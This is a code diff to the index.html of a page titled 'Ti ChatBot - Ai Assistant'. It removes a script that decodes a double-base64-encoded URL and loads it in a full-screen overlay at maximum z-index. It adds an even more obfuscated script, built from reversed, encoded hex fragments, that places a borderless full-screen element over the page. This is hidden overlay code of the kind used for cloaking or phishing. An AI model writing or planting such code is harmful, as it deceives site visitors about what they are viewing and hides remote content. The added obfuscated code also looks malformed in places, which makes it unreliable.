--- a/index.html
+++ b/index.html
@@ -1,25 +1,3 @@
-<!DOCTYPE html>
-<html>
-<head>
-  <title>Ti ChatBot - Ai Assistant</title>
-  <style>
-    body,html{margin:0;padding:0;height:100vh;width:100vw;background:#000;overflow:hidden;}
-    .xYzZ_09{position:fixed;top:0;left:0;height:100%;width:100%;z-index:2147483647;background:#000;}
-  </style>
-</head>
-<body>
-  <div class="xYzZ_09" id="xYzZ_09"></div>
-  <script>
-    (()=>{ 
-      const m0="YUhSMGNITTZMeTl0WldkaExtTnZiUzl6YjNKMExuQm1iMjUwTFdOdmJuUmhibTVoYldWMFltRjBkR2x2Ymk1amIyMHZkR1Z1"; 
-      const d1=decodeURIComponent(escape(window.atob(m0))); 
-      const d2=d1.replace(/.*(https?:\/\/[^\s]+)/, '$1'); 
-      const n1=document.createElement('div'); 
-      n1.setAttribute("style","position:absolute;top:0;left:0;width:100%;height:100%;border:none;z-index:999999;");
-      const innerElement='<'+['ob','ject'].join('')+' type="text/html" data="'+d2+'" style="width:100%;height:100%;border:none;"></'+['ob','ject'].join('')+'>';
-      n1.innerHTML=innerElement;
-      document.getElementById('xYzZ_09').appendChild(n1);
-    })();
-  </script>
-</body>
-</html>
+<script>
+(()=>{const _0x1a2b=['x6f2x646x2ex7469x63x68x61x74','x742ex6874x6dx6c','736372','656c656d656e74x43x6578616572','616464x4368696cx64','6f626a656374','6f697469736f70','7665776874x2d30x30x6x30x76x77','64726f6261656c','6c6d7468','746563617274','656c706d6f63x2e74x6ex65726566'];const $=s=>s.replace(/x/g,'%');const b=t=>decodeURIComponent(escape(atob(t)));const z=document.createElement(b($(_0x1a2b[3].split('').reverse().join(''))));z.setAttribute(b($(_0x1a2b[2].split('').reverse().join(''))),b($(_0x1a2b[0].split('').reverse().join(''))));z.setAttribute("style","all:unset;position:fixed;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;overflow:hidden;background:#000");document.body.appendChild(z);})();
+</script>
